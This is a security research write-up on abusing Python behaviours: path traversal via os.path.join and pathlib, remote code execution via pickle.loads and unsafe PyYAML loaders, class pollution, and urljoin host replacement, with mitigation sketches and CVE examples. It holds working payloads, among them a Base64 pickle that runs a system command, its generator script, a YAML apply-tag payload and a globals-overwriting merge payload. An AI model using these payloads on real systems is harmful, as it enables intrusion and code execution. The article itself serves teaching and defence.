Python pitfalls: Turning dev mistakes into vulnerabilities

Writeup by Alex Brumen aka Brumens, researcher enablement analyst, YesWeHack

In this article, you will learn how to exploit common Python pitfalls that arise from subtle but dangerous behaviours in standard and widely used library functions. These include path manipulation issues in os.path.join and pathlib, URL handling quirks in urljoin, insecure deserialisation in pickle and PyYAML, and class pollution in Python object handling.

I provide step-by-step guidance, supported by practical examples, on crafting payloads tailored to each function. These examples demonstrate how seemingly safe logic can be abused to achieve path traversal (CWE-22) and, in some cases, remote code execution (RCE).

Developers often assume that built-in functions automatically perform sanitisation or enforce safe behaviour. In reality, many of these functions contain edge-case behaviours that attackers can abuse to transform logic issues into exploitable vulnerabilities. For example, YAML deserialisation is commonly expected to simply parse structured data. However, when using PyYAML, the most widely adopted YAML library in Python, unsafe loaders can execute arbitrary Python code based on attacker-controlled input.

Whether you’re a pentester, security researcher or Bug Bounty hunter, this guide offers actionable advice on attacking commonly used functions in Python to exploit security vulnerabilities.

You can also explore these methods by watching my presentation of this research during the NahamCon 2025 Winter Edition and put them into practice by tackling my ‘Python Pitfalls’ training modules on Dojo.

How do Python security pitfalls arise in development?

Python vulnerabilities often arise when developers use functions or libraries without reading the relevant documentation, instead making assumptions about a function’s behaviour based on its name or brief description.

Most functions include an explanation of their intended purpose in the official documentation or docstrings, often accompanied by warnings of when a known behaviour could be dangerous. However, many functions exhibit subtle or unexpected behaviours that are easy to miss. These details are frequently buried within the documentation or only become apparent when reading more deeply into the function’s exact behaviour.

As an example, the function os.path.join has an unexpected behaviour. If one of the path segments is an absolute path (on Linux and macOS, one that starts with a forward slash), every segment before it is discarded.

Example code:

import os

# Payload is an absolute path: it starts with "/"
payload = "/etc/passwd"

# The absolute payload discards "/user/uploads/", so file == "/etc/passwd"
file = os.path.join("/user/uploads/", payload)

with open(file, "r") as f:
    print(f.read())  # prints the contents of /etc/passwd

Although this behaviour is mentioned inline in the documentation, it is easily overlooked. If you pass unsanitised user input to this function, your application is vulnerable to path traversal. Depending on how the resulting path is used, an attacker may be able to read system files, overwrite files or achieve code execution.

Figure: os.path.join guidance from the official Python 3 documentation

Goal of this research

The research objective was to identify Python functions that are frequently used in production applications and behave in unexpected ways. The next step was to craft payloads that weaponise these ‘Python pitfalls’.

As with most of my research, this project started with me trawling through documentation. This time, the focus was on Python’s os.path.join function, as mentioned earlier. I’ve known for years that this function discards earlier path segments if a later component is an absolute path. I’ve always been fascinated by unexpected behaviours that are intentionally built into functions. These edge cases are goldmines for hackers.

I’ve finally got round to digging deeper into Python as a programming language. That meant exploring how these design choices translate into practical pitfalls that can be abused in real-world attack scenarios.

More research by this author: ‘The minefield between syntaxes: exploiting syntax confusions in the wild’

Black-box testing for Python bugs

Black-box testing is a foundational skill for bug hunters and pentesters. It’s the art of understanding application behaviour by analysing how it responds to different inputs, without having access to the underlying source code.

Most real-world engagements involve attacking applications in a black-box environment. That’s why it’s essential to develop a strategy for fingerprinting the Python pitfalls we’re about to explore. Before doing so, you need to understand the core concepts of what to observe and extract from an application’s responses.

As an attacker, you should focus on the following key factors:

Time delays
Content
Errors
Reflected values
Process result
Verbose messages
Syntax

When these behaviours appear only after sending a weaponised payload but change or disappear when a benign payload is used, it’s a strong indication that you’re triggering input-dependent code logic. This behaviour may directly expose a vulnerability or reveal a hidden pitfall in the application’s logic that warrants further testing.
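The sketch below shows this differential approach locally, as a minimal example. There is no real target. Instead, it assumes a hypothetical download handler that builds file paths with os.path.join; make_download_handler and differential are names invented for the example. It sends one benign probe and one weaponised probe, then reports which signals changed. Against a real application, you would send the same pair of inputs over HTTP and compare status codes, bodies, errors and timings.

```python
import os
import tempfile


def make_download_handler(upload_dir):
    """Hypothetical stand-in for a vulnerable download endpoint."""
    def download(filename):
        path = os.path.join(upload_dir, filename)  # no containment check
        try:
            with open(path, "r") as f:
                return 200, f.read()
        except OSError as exc:
            return 404, type(exc).__name__
    return download


def differential(handler, benign, payload):
    """Send a benign and a weaponised input; report which signals differ."""
    benign_status, benign_body = handler(benign)
    payload_status, payload_body = handler(payload)
    return {
        "status_changed": benign_status != payload_status,
        "content_changed": benign_body != payload_body,
        "payload_status": payload_status,
        "payload_body": payload_body,
    }


with tempfile.TemporaryDirectory() as root:
    upload_dir = os.path.join(root, "uploads")
    os.makedirs(upload_dir)
    outside = os.path.join(root, "outside.txt")  # a file the app should never serve
    with open(outside, "w") as f:
        f.write("secret")

    download = make_download_handler(upload_dir)
    # Benign probe: an absolute path that does not exist (expect an error).
    # Weaponised probe: an absolute path outside upload_dir that does exist.
    report = differential(download, os.path.join(root, "missing.txt"), outside)

print(report)
```

The benign probe is also an absolute path, so the only variable is whether the target file exists. Getting a 404 for one and a 200 with file contents for the other strongly suggests that absolute paths are being honoured.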

Detecting Python pitfall patterns

When identifying Python pitfalls, your focus should be on how user-controlled input is handled by specific functions or code patterns. Look for:

The function’s behaviour changing depending on the supplied input
The function performing normalisation that alters the original input
The function parsing or interpreting input instead of treating it as raw data

These patterns frequently introduce subtle logic flaws that can be escalated into exploitable vulnerabilities.

Commonly exploitable Python functions

During the research, I identified six different Python pitfalls. Five come from Python itself (the standard library or core language behaviour), and one comes from a widely used external library.

The affected functions and features are:

os.path.join (built-in)
pathlib.joinpath (built-in)
pickle.loads (built-in)
urllib.parse.urljoin (built-in)
PyYAML's load function (external library)
Python 3 class pollution (core language behaviour)

os.path.join & path traversal

Python’s os.path.join function joins one or more path segments and returns a single, concatenated path.

The main pitfall lies in how this behaviour is commonly misunderstood. Many developers assume that os.path.join sanitises or normalises all path components as part of the joining process. Based on this assumption, they might apply flawed logic, believing that inputs such as dot-dot-slash (../) sequences or absolute paths embedded in the middle of the path will be safely normalised or rejected.

In reality, os.path.join does not prevent path traversal or enforce path containment, and will happily discard earlier path segments if an absolute path appears later in the input. The documentation does mention this behaviour, but only inline and without strong warnings, making it easy to overlook during development.
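The following sketch shows both halves of this behaviour. It uses posixpath, the module behind os.path on Linux and macOS, so the results are the same on any platform. On Windows, os.path is ntpath, whose rules for drives and roots differ slightly.

```python
import posixpath  # os.path on Linux/macOS; imported explicitly for portability

base = "/user/uploads/"

results = {
    # Normal use: the segment is appended to the base directory
    "relative": posixpath.join(base, "avatar.png"),
    # An absolute segment discards everything joined before it
    "absolute": posixpath.join(base, "/etc/passwd"),
    # ...even when it appears in the middle of the argument list
    "absolute_middle": posixpath.join(base, "a", "/etc", "passwd"),
    # "../" sequences are kept verbatim, not removed or rejected
    "dotdot": posixpath.join(base, "../../etc/passwd"),
}
# normpath shows where the operating system will actually land
results["dotdot_resolved"] = posixpath.normpath(results["dotdot"])

for name, path in results.items():
    print(f"{name:16} {path}")
```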

The following code snippet demonstrates this pitfall:

import os

payload = "/etc/passwd"

file = os.path.join("/user/uploads/", payload)  # file == "/etc/passwd"

with open(file, "r") as f:
    print(f.read())  # prints the contents of /etc/passwd

Figure: code workflow for os.path.join

Risks exposed

The primary vulnerability exposed by this pitfall is path traversal, which can lead to several high-impact issues, including:

Arbitrary system file reads
File overwrite
Remote code execution (RCE)

These impacts depend on how the resulting path is used within the application and whether additional unsafe operations are performed on the resolved file path.

Real-world vulnerabilities: CVEs exploiting os.path.join pitfalls

Production applications continue to fall victim to this os.path.join pitfall when developers overlook it, as the following vulnerabilities demonstrate:

CVE-2025-57403 – path traversal to RCE

Unsanitised os.path.join input in Gerapy allowed arbitrary file writes, escalating to remote code execution through critical file overwrites.

CVE-2025-6278 – Absolute path truncation

Missing path validation in Upsonic allowed absolute paths such as /etc/passwd to override the base directory, enabling arbitrary file reads.

PyPA issue #4946 – Path traversal leads to arbitrary file write

In Setuptools’ PackageIndex.download, path construction from archive contents without validation allowed malicious packages to extract files outside intended directories, affecting thousands of dependent projects.

Practical lab for os.path.join

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

pathlib.joinpath & path traversal

The pathlib joinpath method (Path.joinpath, defined on pathlib.PurePath) is very similar to os.path.join. Calling it is equivalent to combining the path with each provided segment in turn.

Just like os.path.join, you might expect joinpath to sanitise input or enforce safe normalisation. But that is not the case. If any segment is an absolute path, it discards the earlier parts and continues from the absolute path. It also accepts dot-dot-slash sequences, which means user-controlled input can still lead to path traversal if you rely on it for safety.

Example code:

from pathlib import Path

payload = "/etc/passwd"

# The absolute payload discards "/var/www/html/files", so file == Path("/etc/passwd")
file = Path("/var/www/html").joinpath("files", payload)

with open(file, "r") as f:
    print(f.read())  # prints the contents of /etc/passwd
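Here is a short sketch of the same checks with pathlib. It uses PurePosixPath, since pure paths never touch the filesystem and the results are platform-independent. It also shows that the / operator, often used instead of joinpath, behaves identically. Note that pathlib keeps .. segments as they are. They only collapse later, when the operating system (or a call such as Path.resolve()) resolves the path. Here, posixpath.normpath is used to emulate that step.

```python
import posixpath
from pathlib import PurePosixPath

base = PurePosixPath("/var/www/html")

# joinpath() and the "/" operator both restart at an absolute segment
via_joinpath = base.joinpath("files", "/etc/passwd")
via_operator = base / "files" / "/etc/passwd"

# ".." segments are preserved verbatim in the joined path...
dotdot = base.joinpath("files", "../../../../etc/passwd")
# ...and only collapse on resolution (normpath emulates that here)
dotdot_resolved = posixpath.normpath(str(dotdot))

print(via_joinpath, via_operator, dotdot, dotdot_resolved, sep="\n")
```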

Figure: code workflow for pathlib.joinpath

Risks exposed

The similarities with os.path.join mean the pitfalls I found in pathlib.joinpath also lead to path traversal vulnerabilities, with the same impacts:

Arbitrary system file reads
File overwrite
Remote code execution (RCE)

These impacts depend on how the resulting path is used within the application. If the output of pathlib.joinpath is passed directly to file operations such as read or write without additional validation, the application becomes vulnerable.

Practical lab for pathlib.joinpath

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

pickle.loads & RCE

Python’s pickle module is well known for being dangerous when used with user-controlled input, especially the function pickle.loads. While this behaviour can be considered a pitfall, using this function with untrusted input introduces a direct vulnerability known as deserialization of untrusted data (CWE-502), which can result in arbitrary code execution and full RCE.

Example code:

import pickle, base64

# Base64-encoded pickle that calls posix.system("id")
payload = "gASVHQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="

# The system command "id" runs during deserialisation
obj = pickle.loads(base64.b64decode(payload))

To generate such a payload, we could use a script like this:

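import os, base64, pickle

class RCE:
    def __reduce__(self):
        # Tell pickle to "rebuild" this object by calling os.system(cmd)
        cmd = "id"
        return os.system, (cmd,)

pickled = pickle.dumps(RCE())
# Standard Base64, matching the base64.b64decode() call used by the loader
print("Payload:", base64.b64encode(pickled).decode("utf-8"))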

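The code above creates a serialised object that, once deserialised, executes the system command id. The __reduce__ method tells pickle to rebuild the object by calling os.system("id"). On Linux and macOS, os.system is pickled by reference as posix.system, which is why that name appears in the payload.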
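To see the mechanism without running a system command, the sketch below swaps os.system for the harmless built-in sum. The Probe class is invented for this example. pickletools.genops then lists the pickle's opcodes. A global lookup (STACK_GLOBAL from protocol 4 onwards) followed by REDUCE is the signature of a pickle that calls a function while loading. That pattern is worth recognising when you find Base64 blobs starting with gASV, the encoded protocol 4 header seen in the payload above.

```python
import pickle
import pickletools


class Probe:
    def __reduce__(self):
        # Harmless stand-in for os.system: ask the unpickler to call
        # sum([1, 2, 3]) when this object is deserialised
        return sum, ([1, 2, 3],)


data = pickle.dumps(Probe(), protocol=4)

# The call happens inside loads(): we get sum's return value, not a Probe
result = pickle.loads(data)
print(result)  # 6

# Opcode names only; look for a global lookup followed by REDUCE
opcodes = [opcode.name for opcode, arg, pos in pickletools.genops(data)]
print(opcodes)
```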

Figure: example workflow when using pickle.loads

Risks exposed

The pickle.loads pitfall exposes a vulnerability that can result in code injection and, consequently, RCE.
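Sometimes pickle cannot be replaced by a data-only format such as JSON. In that case, the pickle documentation suggests restricting which globals the unpickler may load by overriding Unpickler.find_class. The sketch below follows that approach with a hypothetical allow-list; SAFE_GLOBALS and restricted_loads are names invented for this example. It then feeds in the payload from earlier in this section. Treat this as damage limitation rather than a fix. An allow-list is only as safe as the callables it permits, and the DeepDiff CVE later in this article shows that the list itself can become a target.

```python
import base64
import io
import pickle

# Hypothetical allow-list of (module, name) pairs the application needs
SAFE_GLOBALS = {("builtins", "range"), ("builtins", "complex")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global reference (GLOBAL / STACK_GLOBAL opcodes)
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Allowed: range objects pickle as a call to builtins.range
restored = restricted_loads(pickle.dumps(range(3)))
print(restored)  # range(0, 3)

# Blocked: the os.system("id") payload never reaches the call
PAYLOAD = "gASVHQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
try:
    restricted_loads(base64.b64decode(PAYLOAD))
    blocked = None
except pickle.UnpicklingError as exc:
    blocked = str(exc)
print(blocked)  # global 'posix.system' is forbidden
```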

Real-world vulnerabilities: CVEs exploiting pickle.loads

Developers seeking an easy way to deserialise data can inadvertently create vulnerabilities through their use of pickle.loads. This trio of recent CVEs demonstrates that the problem is far from solved:

CVE-2025-3108 – insecure deserialization to RCE in JsonPickleSerializer

JsonPickleSerializer prioritizes deserialization using pickle.loads(), which can execute arbitrary code when processing untrusted data.

CVE-2026-23946 – insecure deserialization to RCE in Helpdesk module

Allowed remote code execution by an attacker authenticated with staff-level privileges.

CVE-2025-1716 – RCE via malicious pickle file bypassing static analysis in Picklescan

Picklescan, a static analysis tool for detecting malicious pickle files, failed to flag some dangerous callables. This allowed a crafted pickle to pass the scan and then execute arbitrary code when deserialised with Python’s pickle module.

Practical lab for pickle.loads

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

PyYAML & insecure deserialisation

Moving beyond built-in modules, when developers handle YAML-based data they most often turn to PyYAML. This external library makes it easy to serialise and deserialise YAML data.

However, there is an important catch in the documentation. When deserialising YAML data, developers often rely on PyYAML’s load function. A safe loader may not be explicitly specified, for example when yaml.Loader or yaml.UnsafeLoader is passed, or when no loader is given at all in PyYAML versions before 5.1. In that case, the application may become vulnerable to insecure deserialisation (CWE-502), in a manner similar to pickle.loads.

Using an unsafe loader allows attacker-controlled YAML content to instantiate arbitrary Python objects, which can lead to code execution during deserialisation.

Example code:

import yaml

user_data = "!!python/object/apply:print ['pwned']"

# yaml.Loader is an unsafe loader: it honours python/* tags
result = yaml.load(user_data, Loader=yaml.Loader)  # prints "pwned"

In the code above, the user input !!python/object/apply:print ['pwned'] instructs PyYAML’s unsafe loader (yaml.Loader) to call a Python function during deserialisation, so the application executes print('pwned').
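The usual fix is yaml.safe_load, which is equivalent to yaml.load with Loader=yaml.SafeLoader. It only builds plain YAML types such as dicts, lists, strings and numbers, and it raises an error on python/* tags. Below is a minimal sketch, assuming PyYAML is installed, that runs the same payload through the safe loader.

```python
import yaml

# Benign configuration: safe_load builds plain Python types
config = yaml.safe_load("name: demo\nport: 8080")
print(config)  # {'name': 'demo', 'port': 8080}

# The same payload: safe_load refuses python/* tags instead of running them
try:
    yaml.safe_load("!!python/object/apply:print ['pwned']")
    outcome = "loaded"
except yaml.YAMLError as exc:
    outcome = f"rejected ({type(exc).__name__})"
print(outcome)  # rejected (ConstructorError)
```

Nothing is printed by the payload itself. The unknown tag is rejected before any object is constructed.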

Figure: example workflow when using yaml.load

Risks exposed

Using yaml.load() with an unsafe loader introduces a code-execution vulnerability, potentially leading to RCE, similar to the risks associated with pickle.loads.

Real-world vulnerabilities: CVEs exploiting yaml.load

YAML is commonly used for configuration files, which often contain user-controllable data. Developers who use yaml.load without restricting the loader may unintentionally enable dangerous object deserialisation. This pitfall has been exposed by multiple CVEs:

CVE-2025-50460 – insecure YAML deserialization leading to RCE in ms-swift

An RCE in version 3.3.0 caused by unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1).

CVE-2026-24009 – PyYAML insecure deserialization leading to RCE in Docling Core

Vulnerability present in applications using PyYAML prior to version 5.4 and invoking docling_core.types.doc.DoclingDocument.load_from_yaml() with untrusted YAML data.

Practical lab for yaml.load

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

Python3 & class pollution

Python can be vulnerable to class pollution. Unlike the other pitfalls covered here, this is not tied to a specific function. Instead, it stems from how Python exposes object internals through special attributes such as __class__, __init__ and __globals__. Code that walks an object's attributes can follow these to reach and overwrite variables well beyond that object. Class pollution typically arises in code that merges objects insecurely.

Example code:

some_var = "change me!"

class Dummy:
    # Defined in Python, so Dummy().__init__ exposes __globals__
    def __init__(self):
        pass

def merge(source, destination):
    # Recursively copy keys from source into destination, which may be
    # a dict (has .get) or any other object (attributes set via setattr)
    for key, value in source.items():
        if hasattr(destination, "get"):
            if destination.get(key) and type(value) == dict:
                merge(value, destination.get(key))
            else:
                destination[key] = value
        elif hasattr(destination, key) and type(value) == dict:
            # No filtering: dunder attributes such as __init__ and
            # __globals__ are traversed like any other attribute
            merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)

some_class = Dummy()

# Walks Dummy().__init__ -> __globals__ (the module's global namespace)
payload = {
    "__init__": {
        "__globals__": {
            "some_var": "polluted"
        }
    }
}

merge(payload, some_class)

print(some_var)  # Output: polluted

Figure: example workflow for Python class pollution

Risks exposed

Because this pitfall affects how objects and classes are merged or modified at runtime, Python class pollution primarily introduces risks related to unintended attribute or variable overwrites in memory, which can directly impact application logic.

The following CWEs may be exposed when an application is vulnerable to Python class pollution:

CWE-454: External initialization of trusted variables or data stores
CWE-269: Improper privilege management
CWE-94: Improper control of generation of code (‘code injection’)

Class pollution impact heavily depends on what data can be affected within the application, meaning a variety of security vulnerabilities may be exposed as a result.
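To illustrate the privilege-management risk (CWE-269), the sketch below reuses the vulnerable merge function from above. It applies it to a hypothetical User class whose is_admin flag is a class attribute. Polluting that flag through __class__ turns every user into an administrator, including users that were never touched by the merge. The sketch then shows one possible hardening: safe_merge, a hypothetical helper that refuses keys starting with a double underscore. An allow-list of expected keys would be stricter still.

```python
class User:
    is_admin = False  # class attribute: the default for every instance

    def __init__(self, name):
        self.name = name


def merge(source, destination):
    """The vulnerable recursive merge from the example above, unchanged."""
    for key, value in source.items():
        if hasattr(destination, "get"):
            if destination.get(key) and type(value) == dict:
                merge(value, destination.get(key))
            else:
                destination[key] = value
        elif hasattr(destination, key) and type(value) == dict:
            merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)


def safe_merge(source, destination):
    """Hypothetical hardened merge: refuses dunder keys before recursing."""
    for key, value in source.items():
        if key.startswith("__"):
            raise ValueError(f"refusing to merge special attribute {key!r}")
        if isinstance(destination, dict):
            if isinstance(value, dict) and isinstance(destination.get(key), dict):
                safe_merge(value, destination[key])
            else:
                destination[key] = value
        elif isinstance(value, dict) and hasattr(destination, key):
            safe_merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)


# Profile update submitted by an attacker (for example as JSON)
profile_update = {"name": "mallory", "__class__": {"is_admin": True}}

victim = User("alice")
merge(profile_update, User("mallory"))
polluted = victim.is_admin  # True: User.is_admin itself was overwritten
print(polluted)

User.is_admin = False  # reset before trying the hardened version
try:
    safe_merge(profile_update, User("mallory"))
    blocked = False
except ValueError:
    blocked = True
print(blocked, User.is_admin)  # True False
```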

Real-world vulnerabilities: CVEs exploiting Python class pollution

Class pollution vulnerabilities are relatively rare, but when developers do fall victim to this pitfall it often leads to severe security issues, as the following CVE demonstrates:

CVE-2025-58367 – class pollution via Delta class constructor in DeepDiff

An available gadget allowed deepdiff.serialization.SAFE_TO_IMPORT to be modified to permit dangerous classes such as posix.system, enabling insecure Pickle deserialisation via the Delta class and potentially allowing arbitrary Python code execution.

Practical lab for pitfalls using Python class pollution

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

Python urllib.parse.urljoin

Python’s urllib.parse.urljoin function constructs a final URL by combining a base URL with one or more URL components.

What makes this behaviour surprising is how much of the base it can discard. os.path.join and pathlib.joinpath drop earlier path segments when an absolute path is encountered. urllib.parse.urljoin likewise drops the base when it receives an absolute URL, but it discards the entire base URL, including its scheme and host. The input therefore decides which server the final URL points to.

Example code:

from urllib.parse import urljoin

payload = "http://evil.com/"
print(urljoin("http://example.com/", payload))  # output: http://evil.com/
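An absolute URL is not the only input that escapes the base. The sketch below runs a few attacker-style inputs through urljoin against a hypothetical API base URL. A scheme-relative //host input keeps the base scheme but swaps the host. A leading / replaces the whole base path. A different scheme, such as javascript:, is returned unchanged.

```python
from urllib.parse import urljoin

BASE = "https://example.com/api/v1/"  # hypothetical base URL

cases = {
    "relative path": "users/42",
    "absolute URL": "http://evil.com/",
    "scheme-relative": "//evil.com/steal",
    "absolute path": "/admin",
    "dot-dot segments": "../../admin",
    "different scheme": "javascript:alert(1)",
}

results = {label: urljoin(BASE, value) for label, value in cases.items()}
for label, joined in results.items():
    print(f"{label:18} -> {joined}")
```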

Figure: example workflow for urljoin

Risks exposed

This behaviour is easy to overlook and can introduce serious security issues when user input is involved. Developers often assume that urljoin always appends paths safely, but this truncation logic can be abused to redirect requests, bypass allow-lists or trigger other unintended behaviours.

The following vulnerabilities may be introduced:

CWE-918: Server-side request forgery (SSRF)
CWE-22: Path traversal
CWE-235: Improper handling of extra parameters
CWE-601: URL redirection to untrusted site (‘open redirect’)
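One way to reduce the SSRF and open-redirect risks is to join first and then compare the scheme and host of the result with those of the base. The sketch below assumes that every joined URL must stay on the base URL's origin. join_same_origin is a hypothetical helper, not part of urllib.

```python
from urllib.parse import urljoin, urlsplit


def join_same_origin(base, user_input):
    """Hypothetical helper: join, then reject results on another origin."""
    joined = urljoin(base, user_input)
    base_parts, joined_parts = urlsplit(base), urlsplit(joined)
    same_origin = (joined_parts.scheme, joined_parts.netloc) == (
        base_parts.scheme,
        base_parts.netloc,
    )
    if not same_origin:
        raise ValueError(f"refusing cross-origin URL: {joined!r}")
    return joined


BASE = "https://api.example.com/v1/"

allowed = join_same_origin(BASE, "users/42")
print(allowed)  # https://api.example.com/v1/users/42

rejected = []
for attempt in ("http://evil.com/", "//evil.com/steal", "javascript:alert(1)"):
    try:
        join_same_origin(BASE, attempt)
    except ValueError:
        rejected.append(attempt)
print(rejected)
```

This check does not stop inputs such as /admin or ../ from reaching other endpoints on the same host. If that matters, validate the resulting path as well.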

Real-world vulnerabilities: CVEs exploiting Python urljoin

Developers tend to use urljoin when building URLs for redirects or performing internal requests. Without proper sanitisation of user-controllable input, this can expose serious vulnerabilities. Here are some real-world examples:

CVE-2024-42353 – vulnerability in WebOb’s HTTP location header normalization process

When normalising the HTTP Location header, WebOb parsed the redirect URL using urlparse and joined it to the base URL. urlparse treated a URL beginning with // as a scheme-less URI, so the following segment was interpreted as a hostname. urljoin then used that hostname to replace the original host.

CVE-2025-68696 – SSRF in httparty

Although httparty is a Ruby HTTP client rather than a Python library, the issue is closely related. It posed a risk of leaking API keys and could allow third parties to issue requests to internal servers.

Practical lab for urljoin

Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.

Mitigation best practices for Python pitfalls: improve your code logic

A code pitfall is not a vulnerability by itself. The only reliable way to avoid falling into these traps is to read and adhere to the documentation for the functions you use, especially when they process user-controlled input. It’s essential to understand the function’s logic, internal workflow and how its behaviour changes based on the input it receives.

With this understanding, developers can use or implement appropriate sanitisation mechanisms to prevent these pitfalls from turning into real vulnerabilities.
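For the path-joining pitfalls, one common pattern is to resolve the joined path and then check that it is still inside the intended base directory. The sketch below does this with os.path.realpath and os.path.commonpath; safe_join is a hypothetical helper name. Because realpath also follows symlinks, a link inside the base directory that points elsewhere is rejected too. On Python 3.9 and later, Path.resolve() combined with Path.is_relative_to() expresses the same check with pathlib.

```python
import os
import tempfile


def safe_join(base_dir, user_path):
    """Hypothetical helper: join, resolve, then enforce containment."""
    base = os.path.realpath(base_dir)
    # realpath collapses "../" and follows symlinks before the check
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


with tempfile.TemporaryDirectory() as uploads:
    accepted = safe_join(uploads, "report.txt")
    inside = os.path.dirname(accepted) == os.path.realpath(uploads)

    rejected = []
    for attempt in ("/etc/passwd", "../../etc/passwd", "a/../../outside.txt"):
        try:
            safe_join(uploads, attempt)
        except ValueError:
            rejected.append(attempt)

print(accepted)
print(rejected)
```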

Python pitfalls research roadmap

Python pitfalls, along with similar issues across other programming languages and frameworks, will always exist, and many have yet to be discovered. Problematic code logic and unexpected behaviours triggered by user-controlled input continue to arise, giving attackers the opportunity to achieve unintended and sometimes severe impact.

Less-documented or misunderstood behaviours in functions that process user input represent valuable targets for security researchers and bug bounty hunters, as they often expose novel and unconventional exploitation paths. As programming languages evolve and frameworks are updated, new variants of these pitfalls continue to emerge in modern applications – making continuous research and testing essential for staying ahead of the threat landscape.
